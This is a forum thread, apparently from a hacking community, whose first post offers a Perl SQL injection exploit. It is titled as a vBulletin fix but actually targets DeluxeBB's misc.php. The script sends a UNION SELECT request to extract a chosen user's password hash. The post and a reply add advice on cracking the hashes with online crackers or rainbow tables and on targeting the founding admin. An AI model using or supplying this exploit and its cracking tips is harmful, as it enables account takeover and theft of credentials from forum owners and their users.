Results 1 to 3 of 3
  1. #1
    Krypton1x's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Tacoma
    Posts
    13,296
    Reputation
    1184
    Thanks
    1,196
    My Mood
    Brooding

    [FIX] VBulletin 3.6.1 MD5 exploit

    Here is the fixed code:

    Code:
    #!/usr/bin/perl 
    
    use IO::Socket; 
    
    
    print q{ 
    ###################################################### 
    # DeluxeBB Remote SQL Injection Exploit # 
    # vbulletin Remote SQL Injection Exploit # 
    ###################################################### 
    }; 
    
    if (!$ARGV[2]) { 
    
    print q{ 
    Usage: perl dbbxpl.pl host /directory/ victim_userid 
    
    perl dbbxpl.pl www.nekisite.com /forum/ 1 
    
    
    }; 
    
    } 
    
    
    $server = $ARGV[0]; 
    $dir = $ARGV[1]; 
    $user = $ARGV[2]; 
    $myuser = $ARGV[3]; 
    $mypass = $ARGV[4]; 
    $myid = $ARGV[5]; 
    
    print "------------------------------------------------------------------------------------------------\r\n"; 
    print "[>] SERVER: $server\r\n"; 
    print "[>] DIR: $dir\r\n"; 
    print "[>] USERID: $user\r\n"; 
    print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
    
    $server =~ s/(https:\/\/)//eg; 
    
    $path = $dir; 
    $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ; 
    
    
    print "[~] PREPARE TO CONNECT...\r\n"; 
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
    
    print "[+] CONNECTED\r\n"; 
    print "[~] SENDING QUERY...\r\n"; 
    print $socket "GET $path HTTP/1.1\r\n"; 
    print $socket "Host: $server\r\n"; 
    print $socket "Accept: */*\r\n"; 
    print $socket "Connection: close\r\n\r\n"; 
    print "[+] DONE!\r\n\r\n"; 
    
    
    
    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
    while ($answer = <$socket>) 
    { 
    
    if ($answer =~/(\w{32})/) 
    { 
    
    if ($1 ne 0) { 
    print "Password Hash is: ".$1."\r\n"; 
    print "--------------------------------------------------------------------------------------\r\n"; 
    
    } 
    exit(); 
    } 
    
    } 
    print "------------------------------------------------------------------------------------------------\r\n";
    Just do what is said in tom_alle's post. I recommend md5Crack.com | online md5 cracker for the cracker though...

  2. The Following User Says Thank You to Krypton1x For This Useful Post:

    Vizz (07-31-2010)

  3. #2
    freedompeace's Avatar
    Join Date
    Jul 2010
    Gender
    female
    Posts
    3,033
    Reputation
    340
    Thanks
    2,792
    My Mood
    Sad
    Uhm... This is not a fix. ._.

    Also, you do realise that these passwords are salted, right? You'll need to find the salt before you can crack the MD5.

    Btw, using your own rainbow table is much faster than the online counterparts.

    PS. To get the founding admin's pass - set userid to "1".

    Have fun,

  4. #3
    [D]rUg's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Posts
    263
    Reputation
    10
    Thanks
    10
    thanks ^^ i really needed NOT i dont even know wat this is ^^

Similar Threads

  1. Replies: 8
    Last Post: 02-18-2014, 07:02 PM
  2. [SOLVED]MD5 Fix?
    By SPA777174 in forum Call of Duty Modern Warfare 2 Help
    Replies: 4
    Last Post: 09-12-2010, 04:33 AM
  3. Release Exploiter (Again) Fixed Download
    By Who Fucked My MUM? in forum Visual Basic Programming
    Replies: 4
    Last Post: 09-11-2010, 03:51 AM
  4. New Windows Exploit
    By Dave84311 in forum General
    Replies: 6
    Last Post: 12-31-2009, 05:16 PM